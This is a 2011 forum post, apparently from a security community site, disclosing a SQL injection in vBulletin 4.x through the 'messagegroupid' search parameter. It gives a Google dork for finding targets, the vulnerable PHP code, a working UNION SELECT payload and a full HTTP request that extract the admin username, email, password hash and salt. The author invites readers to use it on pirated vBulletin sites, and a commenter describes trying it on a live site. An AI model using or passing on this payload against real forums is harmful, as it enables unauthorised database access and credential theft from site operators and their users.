• Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

    by
    fb1h2s
    Rate this article
    Published on 07-21-2011 01:37 PM      Number of Views: 3226  
    1 Comment Comments
    # Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
    # Google Dork: intitle: powered by Vbulletin 4
    # Date: 20/07/2011
    # Author: FB1H2S
    # Software Link: [http://www.vbulletin.com/]
    # Version: [4.x.x]
    # Tested on: [relevant os]
    # CVE : [http://members.vbulletin.com/]

    ################################################## ###
    Vulnerability:
    #################################################

    Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.

    ################################################## ###
    Vulnerable Code:
    ################################################## ###

    File: /vbforum/search/type/socialgroupmessage.php
    Line No: 388
    Paramater : messagegroupid


    Code:
            
        if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)

        {

            $value = $registry->GPC['messagegroupid'];

            if (!is_array($value))

            {

                $value = array($value);

            }



            if (!(in_array(' ',$value) OR in_array('',$value)))

            {

                if ($rst = $vbulletin->db->query_read("

                    SELECT socialgroup.name

                    FROM " . TABLE_PREFIX."socialgroup AS socialgroup

--->                    WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")

                
            }
    ################################################## ###
    Exploitation:
    ################################################## ###
    Post data on: -->search.php?search_type=1
    --> Search Single Content Type

    Keywords : Valid Group Message

    Search Type : Group Messages

    Search in Group : Valid Group Id

    &messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    ################################################## #########################################
    Note:
    ################################################## ###

    Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as this one was reported to them by altex, hence customers are safe except lowsy admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".

    ################################################## ###
    More Details:
    ################################################## ###

    Exact Request as follows:

    Code:
    query=Cross+Domain+Content+Extraction+attacks&titleonly=0&searchuser=&starteronly=0&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=1&saveprefs=1&dosearch=Search+Now&s=&securitytoken=1311201469-a9ee9dd6adccba0f8758fce3f02b7e0a267eea75&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
    This article was originally published in forum thread: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day started by fb1h2s View original post
    Comments 1 Comment
    1. Whenilookatyou's Avatar
      Whenilookatyou - 08-31-2011, 09:49 PM


      hmm i do exactly the same thing

      &messagegroupid[0]=5 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

      tried this got an error

      saw that instead of user when i see the tables i get vbuser so i tried this too

      &messagegroupid[0]=5 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM vbuser WHERE userid=1#

      got an error again

      So what am i doing wrong?

  • G4H Twitter

  • Latest Posts

    amolnaik4

    Research Resources for MS SharePoint

    This page contains research notes on Microsoft’s SharePoint MOSS and WSS.

    Link:
    https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29

    amolnaik4 Today, 12:25 PM Go to last post
    b0nd

    Lolz, with the title "About Admin" I thought...

    Lolz, with the title "About Admin" I thought Admins of garage have been exposed ;)

    @hazard74, there is always a proper "way" to ask - you need to discover that. It's not that Pentesters don't have...

    b0nd Today, 09:10 AM Go to last post
    hazard74

    Ok, Anant Shrivastava. Im Sorry :)

    Ok, Anant Shrivastava.

    Im Sorry :)

    hazard74 Yesterday, 06:19 PM Go to last post
    Anant Shrivastava

    not exactly this format but a simmilar kind of a...

    not exactly this format but a simmilar kind of a format i have seen as part of malware. This url format was used to get the commands from the remote server. there was a whole bunch of domain names in...

    Anant Shrivastava Yesterday, 05:30 PM Go to last post
    Immaturedevil

    Hi Neo, Thanks for your comment. I have...

    Hi Neo,

    Thanks for your comment. I have already done that... but no success..as these URLs are not recognized by search engines as such. getting some info if anyone has come across with URLs in...

    Immaturedevil Yesterday, 05:21 PM Go to last post